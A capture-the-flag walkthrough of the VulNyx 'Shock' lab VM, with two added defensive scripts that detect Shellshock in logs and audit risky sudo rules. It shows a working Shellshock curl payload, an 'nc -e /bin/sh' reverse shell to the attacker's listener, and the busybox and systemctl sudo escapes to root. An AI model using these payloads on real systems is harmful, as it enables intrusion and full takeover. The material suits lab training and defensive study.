VulNyx - Shock
Information
Shock is an easy-difficulty vulnerable Linux virtual machine from the VulNyx platform; it was created by the user m0w and runs correctly on the VirtualBox hypervisor.

Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.81
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-19 15:25 CET
Nmap scan report for 192.168.1.81
Host is up (0.0013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp filtered ftp
22/tcp open ssh
80/tcp open http
❯ nmap -sVC -p22,80 192.168.1.81
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-19 15:26 CET
Nmap scan report for 192.168.1.81
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 37:36:60:3e:26:ae:23:3f:e1:8b:5d:18:e7:a7:c7:ce (RSA)
| 256 34:9a:57:60:7d:66:70:d5:b5:ff:47:96:e0:36:23:75 (ECDSA)
|_ 256 ae:7d:ee:fe:1d:bc:99:4d:54:45:3d:61:16:f8:6c:87 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
Shell (www-data)
80/TCP (HTTP)
Site (/)

Directory Brute Force
❯ gobuster dir -w /opt/common.txt -u http://192.168.1.81/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.81/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin/ (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 20]
Progress: 4727 / 4727 (100.00%)
===============================================================
Finished
===============================================================
Site (/cgi-bin)

The /cgi-bin path is a directory reserved by the web server for CGI scripts, i.e. programs the server executes instead of serving as static HTML. Knowing this, I fuzz for files with the extensions such scripts typically use.
Directory Brute Force
❯ gobuster dir -w /opt/common.txt -u http://192.168.1.81/cgi-bin/ -x sh,cgi,py,pl
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.81/cgi-bin/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: sh,cgi,py,pl
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/shell.sh (Status: 500) [Size: 610]
Progress: 23635 / 23635 (100.00%)
===============================================================
Finished
===============================================================
In /cgi-bin I find the file shell.sh.

Shellshock (CVE-2014-6271)
RCE
I confirm that it is vulnerable to Shellshock by executing commands as the www-data user.
❯ curl -H "User-Agent: () { :; }; echo; /bin/bash -c 'id'" "http://192.168.1.81/cgi-bin/shell.sh"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
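From the defender's side, the request above is easy to spot: the Shellshock trigger is an exported function definition ("()" followed by "{") arriving in a header that the CGI handler turns into an environment variable. The following Python script is an added example (not part of the original writeup) that parses Apache combined-format access-log lines and flags requests whose User-Agent or Referer carries that prefix; the log lines are constructed for the example.

```python
import re
from typing import List, Optional

# Constructed sample lines in Apache "combined" log format (not taken from the
# original page): one Shellshock probe against the CGI script, one normal request,
# and one plain request to the CGI script that produced the 500 seen in gobuster.
SAMPLE_ACCESS_LOG = """\
192.168.1.10 - - [19/Feb/2025:15:30:01 +0100] "GET /cgi-bin/shell.sh HTTP/1.1" 200 54 "-" "() { :; }; echo; /bin/bash -c 'id'"
192.168.1.10 - - [19/Feb/2025:15:30:05 +0100] "GET /index.html HTTP/1.1" 200 20 "-" "Mozilla/5.0"
192.168.1.10 - - [19/Feb/2025:15:30:09 +0100] "GET /cgi-bin/shell.sh HTTP/1.1" 500 610 "-" "curl/8.5.0"
"""

# Combined log layout: ip ident user [ts] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# CVE-2014-6271 is triggered by a function definition at the start of an
# environment value: "()" then "{". The vulnerable parser tolerates optional
# whitespace between the tokens, so the pattern allows it too.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')


def is_shellshock_payload(value: str) -> bool:
    """True if a header value carries the function-definition prefix that triggers the bug."""
    return SHELLSHOCK_RE.search(value) is not None


def parse_line(line: str) -> Optional[dict]:
    """Split one combined-format line into named fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_access_log(text: str) -> List[dict]:
    """Return one finding per request whose User-Agent or Referer carries the pattern."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hit_fields = [f for f in ("ua", "referer") if is_shellshock_payload(rec[f])]
        if not hit_fields:
            continue
        # A 200 on a CGI path means the script actually ran with the attacker's
        # environment; anything else is more likely a failed probe.
        targets_cgi = rec["path"].startswith("/cgi-bin/")
        findings.append({
            "src": rec["ip"],
            "path": rec["path"],
            "status": int(rec["status"]),
            "fields": hit_fields,
            "severity": "high" if targets_cgi and rec["status"] == "200" else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_ACCESS_LOG):
        print(finding)
```

The combined log format only records two client-controlled headers (User-Agent and Referer), so this scanner sees only those; the same prefix can arrive in Cookie or any custom header, which means full header logging or an inline filter in front of the CGI handler is needed for complete coverage. The real fix is the patched bash (the function-definition import is no longer honoured for arbitrary variable names), after which the pattern in a log is still worth alerting on as a sign of scanning.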
Reverse Shell
With command execution confirmed, I try to obtain a reverse shell.
❯ curl -H "User-Agent: () { :; }; echo; /bin/bash -c 'nc -e /bin/sh 192.168.1.10 443'" "http://192.168.1.81/cgi-bin/shell.sh"
I get the shell as the www-data user.
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.81] 57676
id ; hostname
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shock
Shell (will)
Enumeration
Sudo
The www-data user can run the busybox binary as will with sudo.
bash-4.3$ sudo -l
Matching Defaults entries for www-data on shock:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on shock:
(will) NOPASSWD: /usr/bin/busybox
Abuse
GTFOBins provides the one-liner to break out into a shell.
bash-4.3$ sudo -u will /usr/bin/busybox sh
BusyBox v1.30.1 (Debian 1:1.30.1-4) built-in shell (ash)
Enter 'help' for a list of built-in commands.
/usr/lib/cgi-bin $ id ; hostname
uid=1001(will) gid=1001(will) groups=1001(will)
shock
/usr/lib/cgi-bin $ bash -i
will@shock:/usr/lib/cgi-bin$
Privilege Escalation
Enumeration
Sudo
The will user can run the systemctl binary as root with sudo.
will@shock:~$ sudo -l
Matching Defaults entries for will on shock:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User will may run the following commands on shock:
(root) NOPASSWD: /usr/bin/systemctl
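Both sudo rules on this box (www-data running busybox as will, and will running systemctl as root) share the same defect: a bare binary path with NOPASSWD, which lets the caller pass any arguments and, for these binaries, reach a shell. As an added example that is not part of the original writeup, the following Python script parses `sudo -l` style output and flags rules where a known shell-escape-capable binary is allowed without argument restrictions. The sample input is constructed in the format the page shows, with one argument-restricted rule added for contrast.

```python
import re
from typing import List

# Constructed sample in the format printed by `sudo -l` (modelled on the page's
# output, plus one argument-restricted rule for contrast).
SAMPLE_SUDO_L = r"""Matching Defaults entries for will on shock:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User will may run the following commands on shock:
    (root) NOPASSWD: /usr/bin/systemctl
    (root) /usr/bin/systemctl restart apache2
    (will) NOPASSWD: /usr/bin/busybox
"""

# Binaries that spawn a shell or read/write arbitrary files when run without
# argument restrictions. busybox and systemctl are the ones on this page; the
# rest are well-known GTFOBins entries.
SHELL_ESCAPE_BINS = {
    "busybox", "systemctl", "vim", "vi", "less", "more", "find",
    "awk", "env", "python3", "perl",
}

# One command line from `sudo -l`: "(runas) TAG: TAG: /path args, /path2 args"
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$')


def parse_rules(text: str) -> List[dict]:
    """Extract one record per allowed command from `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # Defaults lines and headers do not start with "(runas)"
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        runas = m.group("runas").split(":")[0].strip()  # "(user : group)" -> user
        for cmd in re.split(r',\s*', m.group("cmds").strip()):
            parts = cmd.split()
            rules.append({
                "runas": runas,
                "binary": parts[0],
                "args": parts[1:],
                "nopasswd": "NOPASSWD" in tags,
            })
    return rules


def audit_rules(rules: List[dict]) -> List[dict]:
    """Flag rules that hand out a shell-capable binary with no argument restriction."""
    findings = []
    for r in rules:
        name = r["binary"].rsplit("/", 1)[-1]
        unrestricted = not r["args"]          # bare path => any arguments accepted
        escape = name in SHELL_ESCAPE_BINS or r["binary"] == "ALL"
        if not (escape and unrestricted):
            continue
        severity = "critical" if r["runas"] in ("root", "ALL") else "high"
        findings.append({
            "runas": r["runas"],
            "binary": r["binary"],
            "nopasswd": r["nopasswd"],
            "severity": severity,
            "fix": "pin the allowed subcommand and arguments in the sudoers rule",
        })
    return findings


if __name__ == "__main__":
    for finding in audit_rules(parse_rules(SAMPLE_SUDO_L)):
        print(finding)
```

The audit treats a bare path as "any arguments", which is exactly what sudoers means by it. For systemctl, pinning arguments is only part of the fix: subcommands that page their output still open the pager, so the allowed argument list should also include `--no-pager` (or the rule should be replaced by a dedicated wrapper that does not page).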
Abuse
GTFOBins provides the one-liner to break out into a shell.
will@shock:~$ sudo -u root /usr/bin/systemctl
When systemctl runs it opens in paginated mode, and with !/bin/sh I become the root user.
!/bin/bash
root@shock:/home/will# id ; hostname
uid=0(root) gid=0(root) groups=0(root)
shock
Flags
Now as the root user I can read the user.txt and root.txt flags.
root@shock:/home/will# find / -name user.txt -o -name root.txt |xargs cat
f47fa6**************************
0afcf8**************************
That concludes the walkthrough of the Shock machine.
Happy Hacking!